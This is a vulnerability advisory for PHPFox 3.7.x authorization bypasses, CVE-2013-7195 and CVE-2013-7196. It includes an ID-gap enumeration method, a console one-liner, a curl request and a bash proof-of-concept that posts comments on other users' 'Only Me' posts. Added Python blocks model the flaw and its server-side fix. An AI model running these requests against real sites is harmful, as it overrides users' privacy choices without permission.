PHPFox 3.7.5 Authorization Bypass

Posted Apr 5, 2014
Authored by Wesley Henrique Leite

PHPFox versions 3.7.3, 3.7.4, and 3.7.5 suffer from an authorization bypass vulnerability: an authenticated user with no relationship to the owner can comment on, and (before 3.7.5) "like", publications whose privacy is set to "Only Me".

tags | exploit, bypass
advisories | CVE-2013-7195, CVE-2013-7196
SHA-256 | 84a321644bc5672cd3b2d3c2854da4b46721879da9583f0d746fbf2c378aa4e4

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CNA primary
MITRE Corporation ( cve-assign@mitre.org )


Software Vendors
PHPFox ( http://www.phpfox.com )
Product ( http://demo.phpfox.com )
Version: v3.7.3, v3.7.4 and v3.7.5

Research
Wesley Henrique Leite ( wesleyhenrique [\\NOSPAM**] gmail \\NOSPAM// com )


[+] INFORMATION
Vendor Notified : 2013-12-13
Vendor Homepage : www.phpfox.com

[+] CVEID
CVE-2013-7195
CVE-2013-7196

Released fix 2014-02-26:
[+] Flag as "like" a publication set to "Only Me"
Update to version v3.7.5
Released fix 2014-04-03:
[+] Comment on a publication set to "Only Me"
Update to version v3.7.6

Description of the problem:
[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)
[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)


[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)


Analyzing how comments and "likes" are added to a publication, it was
possible to manipulate the requests so that a publication whose privacy is
set to "ONLY ME" receives a comment, or is marked as "like", from an
external user who has no relationship with the owner. Private "Only Me"
publications are easy to discover by reading the page source: every
publication receives a sequential unique identifier, so the identifiers
that are missing from the sequence visible in the source are the
candidates (each is either removed or private).


$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);


Unique ID      Possible Privacy
26 ----------> public
27 ----------> removed or private
28 ----------> public
29 ----------> removed or private
30 ----------> public
31 ----------> removed or private
32 ----------> removed or private
33 ----------> public


This logic can be applied to other types of publications, such as videos,
links and so on.
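The ID-gap technique above, as an added example (not code from the advisory or from phpFox): it extracts the item IDs from the doLike() calls in a page source and reports the missing IDs in the observed range, exactly the table the advisory builds by hand. The HTML snippet is constructed for the example; only the doLike() argument order (type as the second argument, item ID as the third) is taken from the advisory.

```python
import re

# Constructed sample of page source, modelled on the doLike() calls shown in
# the advisory. The markup around the calls is made up for this example.
SAMPLE_HTML = """
<div class="feed_item">...</div>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this); return false;">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this); return false;">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this); return false;">Like</a>
<a href="#" onclick="$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this); return false;">Like</a>
"""

# Second argument is the item type, third is the item ID (per the advisory).
DOLIKE_RE = re.compile(
    r"\$Core\.Like\.Actions\.doLike\(\s*\d+\s*,\s*'([a-z_]+)'\s*,\s*(\d+)\s*,"
)


def visible_ids(html, item_type="user_status"):
    """Sorted list of item IDs of the given type that appear in doLike() calls."""
    return sorted({int(m.group(2)) for m in DOLIKE_RE.finditer(html)
                   if m.group(1) == item_type})


def candidate_ids(html, item_type="user_status"):
    """IDs missing from the visible sequence: each is either removed or private."""
    seen = visible_ids(html, item_type)
    if not seen:
        return []
    seen_set = set(seen)
    return [i for i in range(seen[0], seen[-1] + 1) if i not in seen_set]


def classify(html, item_type="user_status"):
    """Map every ID in the observed range to 'public' or 'removed or private'."""
    seen = set(visible_ids(html, item_type))
    if not seen:
        return {}
    lo, hi = min(seen), max(seen)
    return {i: ("public" if i in seen else "removed or private")
            for i in range(lo, hi + 1)}


if __name__ == "__main__":
    for item_id, status in classify(SAMPLE_HTML).items():
        print(f"{item_id:>4} -> {status}")
```

The output for the constructed snippet reproduces the advisory's table (27, 29, 31 and 32 are the candidates). Note that the page source only reveals that an ID is absent; whether it is deleted or "Only Me" is learned by attempting the action, which is exactly why the server must perform the privacy check.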


To exemplify, we will assume that the post with ID 27 is private ("ONLY ME").
To mark the publication with ID 27 as "like", just run the code below in
your browser's JavaScript console while logged in as any user:


javascript console:
$Core.Like.Actions.doLike(0, 'user_status', 27, 0, this);


The owner's account is notified, and the user who ran the code above
appears in the list of "likes" of that private publication.


The above problem affects all builds of versions v3.7.3 and v3.7.4.


[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)


Following the logic above, we can identify possible private publications.
We take ID 27 and add a comment to it, remembering that it is private ("Only Me").


These are the parameters of a comment.add request, as sent by the browser:


&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290


Parameters that can be manipulated:


val[text]    -------> Text of the comment
val[type]    -------> user_status, photo, music_song, poll, link, blog
val[item_id] -------> Unique ID of the target publication


To make the process more dynamic, the curl command below was used (the cookie and headers of the attacking user's own session are supplied; the security_token is that user's own CSRF token and does not restrict which item may be targeted).


$ curl 'http://demo.phpfox.com/static/ajax.php' \
-b '<session cookie of your user account>' \
-H '<other headers of your user account>' \
--data '&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290'

The same request can also be issued directly from the browser console.

The above problem affects all builds of versions v3.7.3, v3.7.4 and v3.7.5.
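The root cause described in both findings is that comment.add (and, before v3.7.5, the like action) authorizes the request on the caller's session and CSRF token alone and never consults the privacy of the target item. The following is an added example, not phpFox code: an in-memory model of the endpoint with the behaviour the advisory describes beside a hardened version that resolves the item's privacy server-side. The privacy encoding, the Store/Item names and the friend relation are assumptions made for the example; the same check applies to the like action.

```python
from dataclasses import dataclass, field

# Assumed privacy encoding for this example (phpFox's real values may differ).
PRIVACY_EVERYONE, PRIVACY_FRIENDS, PRIVACY_ONLY_ME = 0, 1, 2


@dataclass
class Item:
    item_id: int
    item_type: str      # user_status, photo, music_song, poll, link, blog
    owner_id: int
    privacy: int


@dataclass
class Store:
    """Constructed stand-in for the database: items, friendships and comments."""
    items: dict = field(default_factory=dict)      # (type, id) -> Item
    friends: set = field(default_factory=set)      # frozenset({user_a, user_b})
    comments: list = field(default_factory=list)   # (type, id, author, text)

    def is_friend(self, a, b):
        return frozenset((a, b)) in self.friends


class AuthorizationError(Exception):
    pass


def comment_add_vulnerable(store, user_id, item_type, item_id, text):
    """Behaviour the advisory describes: any logged-in user may comment on any item.
    The CSRF token (core[security_token]) is the caller's own and is not a check
    on the target, so it is omitted from the model."""
    if user_id is None:
        raise AuthorizationError("login required")
    if (item_type, item_id) not in store.items:
        raise KeyError("no such item")
    store.comments.append((item_type, item_id, user_id, text))
    return True


def can_view(store, user_id, item):
    """Privacy decision taken from the stored item, never from request parameters."""
    if user_id == item.owner_id:
        return True
    if item.privacy == PRIVACY_EVERYONE:
        return True
    if item.privacy == PRIVACY_FRIENDS:
        return store.is_friend(user_id, item.owner_id)
    return False  # PRIVACY_ONLY_ME: nobody but the owner


def comment_add_hardened(store, user_id, item_type, item_id, text):
    """Same endpoint with the missing authorization step added."""
    if user_id is None:
        raise AuthorizationError("login required")
    item = store.items.get((item_type, item_id))
    # One response for both "missing" and "forbidden", so the endpoint does not
    # confirm which IDs in a sequence gap are private rather than deleted.
    if item is None or not can_view(store, user_id, item):
        raise AuthorizationError("item not found")
    store.comments.append((item_type, item_id, user_id, text))
    return True


def demo():
    """Replays the advisory's scenario: IDs 26 (public) and 27 (Only Me) of user 290."""
    store = Store()
    store.items[("user_status", 26)] = Item(26, "user_status", owner_id=290, privacy=PRIVACY_EVERYONE)
    store.items[("user_status", 27)] = Item(27, "user_status", owner_id=290, privacy=PRIVACY_ONLY_ME)
    attacker = 500  # logged in, no relationship with user 290 (constructed)

    results = {}
    results["vuln_public"] = comment_add_vulnerable(store, attacker, "user_status", 26, "hi")
    results["vuln_only_me"] = comment_add_vulnerable(store, attacker, "user_status", 27, "AQUI!!!!!!!!!!!")
    results["hard_public"] = comment_add_hardened(store, attacker, "user_status", 26, "hi")
    try:
        comment_add_hardened(store, attacker, "user_status", 27, "AQUI!!!!!!!!!!!")
        results["hard_only_me"] = True
    except AuthorizationError:
        results["hard_only_me"] = False
    results["owner_only_me"] = comment_add_hardened(store, 290, "user_status", 27, "note to self")
    return results


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:<14} {'comment stored' if allowed else 'rejected'}")
```

The design point is that the authorization decision keys off the stored item (owner, privacy, relationship), not off anything the client sends: val[type] and val[item_id] are only used to look the item up. Returning the same error for a missing and a forbidden item also closes the side channel that would otherwise let an attacker sort the gaps in the ID sequence into "deleted" and "private".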

################
# SCRIPT
################
#!/bin/bash

# This script was developed to demonstrate the problem to the phpFox
# development team. It can easily be adapted for testing other
# applications that use the framework, just by adjusting the
# variable "${TARGET}".
#
# Comments are published with the credentials defined in the variables
#
# USERACCOUNT = "your_mail%40example.com"
# USERPASSWD = "your_password"
#
# Even in the absence of any relationship between the users, or with the
# publication set to "Only Me" (the case that is the focus of this study),
# the comment will be added.
#
# Wesley Henrique Leite
# wesleyhenrique **(A)** gmail **NOSPAM** com
# wesley **(A)** telapreta **NOSPAM** com **NOSPAM** br
#
# USAGE:
# $ comment_only-me.bash <user_status|photo|music_song|poll|link|blog> 777 'Hello all'
#

#AUTH
# encode
# @ = %40 -> teste%40example.com
USERACCOUNT=""
USERPASSWD=""
COOKIE=cookie.txt
SECTOKEN=""
TYPE="$1"
ITEM_ID=$2
MSG="$3"
TARGET="http://demo.phpfox.com"
URL_LOGIN="${TARGET}/user/login"
URL_AJAX="${TARGET}/static/ajax.php"
USER_AGENT="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"


USAGE="Type, Item_id and MSG are required\n $0 <user_status|photo|music_song|poll|link|blog> 777 'Hello all'"

[ -z "${USERACCOUNT}" -o \
-z "${USERPASSWD}" ] && {
echo "Open $0 file and edit USERACCOUNT and USERPASSWD"
exit 1
}

[ $# -eq 3 -a \
! -z "${TYPE}" -a \
! -z "${ITEM_ID}" -a \
! -z "${MSG}" ] || { echo -e "${USAGE}" ; exit 1 ; }

>${COOKIE}

# GET COOKIE AND SECURITY_TOKEN
# -D dumps the response headers (Set-Cookie lines) to the cookie file;
# the 32-hex-digit security_token is scraped from the login page body.
SECTOKEN=$(curl -s -D ${COOKIE} ${TARGET} |
grep 'security_token' |
grep -Ewo '([a-f0-9A-F]){32}' |
sort -u)

# AUTH USER
# SAVE COOKIE
curl "${URL_LOGIN}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H 'Accept-Encoding: gzip,deflate,sdch' \
-H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.6,en;q=0.4' \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' \
-H 'Cache-Control: max-age=0' \
-H 'Connection: keep-alive' \
-D ${COOKIE} \
--data "core%5Bsecurity_token%5D=${SECTOKEN}&val%5Blogin%5D=${USERACCOUNT}&val%5Bremember_me%5D=&val%5Bpassword%5D=${USERPASSWD}" \
--compressed


### COMMENT ADD
curl "${URL_AJAX}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Connection: keep-alive' \
--data "&core[ajax]=true&core[call]=comment.add&core[security_token]=${SECTOKEN}&val[type]=${TYPE}&val[item_id]=${ITEM_ID}&val[parent_id]=0&val[is_via_feed]=${ITEM_ID}&val[default_feed_value]=Write%20a%20comment...&val[text]=${MSG}&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290" \
--compressed

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iF4EAREIAAYFAlM/lEEACgkQd9Htm4AVoW9ToAEAnnZogdYRlKCi3RDfJgkLvbK8
RIQcsz5fsiU9d3nrVKwBAIJFfcsdfVspUpExdtuEFgPJ7Sj7thHURfVHvFGSXvvj
=6hMg
-----END PGP SIGNATURE-----